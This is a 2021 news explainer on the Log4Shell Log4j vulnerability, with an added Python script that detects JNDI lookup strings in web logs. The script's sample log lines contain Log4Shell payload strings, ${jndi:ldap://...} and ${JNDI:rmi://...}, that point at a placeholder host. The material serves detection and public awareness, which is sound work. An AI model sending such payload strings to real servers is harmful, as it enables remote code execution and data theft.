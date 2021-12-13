



Log4Shell is the name given to a critical zero-day vulnerability that surfaced on Thursday when it was exploited in a remote code execution attack against a Minecraft server. The vulnerability lies in Log4j, a logging utility used by thousands, if not millions, of apps, including those used by almost every company on the planet. The Minecraft server was the proverbial canary in the coal mine.

Over the next four days it became clear that Log4Shell was every bit as serious a threat as I had claimed, with the list of affected cloud services reading like a who's who of the Internet. Threat analysts and researchers have been assessing the damage so far and the outlook for the coming weeks and months. Here's what you need to know for now:

What is Log4j? Why is Log4Shell so important? Log4j is an open source Java-based logging tool from Apache. It can perform network lookups through the Java Naming and Directory Interface (JNDI) and fetch resources over the Lightweight Directory Access Protocol (LDAP). The end result: Log4j interprets the log message as a URL, retrieves it, and executes the payload it contains with the full privileges of the main program. Exploits are triggered by text using the ${} lookup syntax and can be placed in browser user agents or other commonly logged attributes.
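As an added detection example (not code from this article or from Apache Log4j), the following Python scans constructed web-server access-log lines for the ${} lookup syntax described above, flagging JNDI lookups separately from other lookups in client-controlled fields; the hosts, paths and sample lines are assumptions.

```python
"""Flag Log4Shell-style lookup strings in access-log lines (added example)."""
import re
from typing import List, Tuple

# The ${...} syntax is what makes Log4j perform a lookup. A lookup naming the
# jndi: scheme is the Log4Shell exploit pattern; any other ${...} arriving in
# a client-controlled field (user agent, query string) still deserves review.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def classify(line: str) -> str:
    """Return 'jndi' for a JNDI lookup, 'lookup' for any other ${...}, else 'clean'."""
    if JNDI_RE.search(line):
        return "jndi"
    if LOOKUP_RE.search(line):
        return "lookup"
    return "clean"


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, verdict, line) for every non-clean line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict != "clean":
            hits.append((number, verdict, line))
    return hits


# Constructed sample lines in combined log format; IPs are documentation
# ranges and the hostname is a reserved .example name (all hypothetical).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.example/a}"',
    '198.51.100.8 - - [10/Dec/2021:14:03:40 +0000] "GET /?x=${JNDI:rmi://lookup-host.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.9 - - [10/Dec/2021:14:04:01 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, verdict, line in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: {line}")
```

Run against real logs, route the 'jndi' verdicts to incident response and triage the 'lookup' verdicts, since legitimate traffic almost never carries ${} in a user agent or query string.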

As Juniper Networks researchers have shown, the exploit looks like this:

[Image: exploit illustration, credit Juniper Networks]

Tracked as CVE-2021-44228, this vulnerability has a severity rating of 10 out of 10. The zero-day was being exploited at least nine days before it surfaced.

The earliest evidence found so far for the #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before it was publicly disclosed. However, there is no evidence of mass exploitation until after it was published.

Matthew Prince (@eastdakota) December 11, 2021

Researchers on Cisco’s Talos security team said they had observed the exploit since December 2.

What has happened since Log4Shell first appeared last Thursday? Almost immediately, security company GreyNoise detected active scanning attempting to identify vulnerable servers. Researchers have confirmed reports of attackers using this critically exploitable vulnerability to install cryptocurrency-mining malware, expand Linux botnets, pull configuration data from vulnerable servers, and steal environment variables and other potentially sensitive data.

What is the prognosis? In the best case, major brokerages, banks, and merchants pay huge amounts of overtime to large numbers of already overworked IT employees to clean up this mess over the holidays. For the worst case, remember the 2017 Equifax breach, and the exposure of 143 million U.S. consumers' data that followed, when the company failed to patch a similarly catastrophic vulnerability. I don't want to think about that scenario.

It's bad. What should I do? Indeed. As an end user, there's not much you can do other than keep track of the services you use and ask what they are doing to keep the data you entrust to them safe. The most straightforward thing a cloud service can do is update Log4j, but for large companies it's often not that simple. Dozens of security companies have published guidance. Here and here is advice from Microsoft and Sophos.

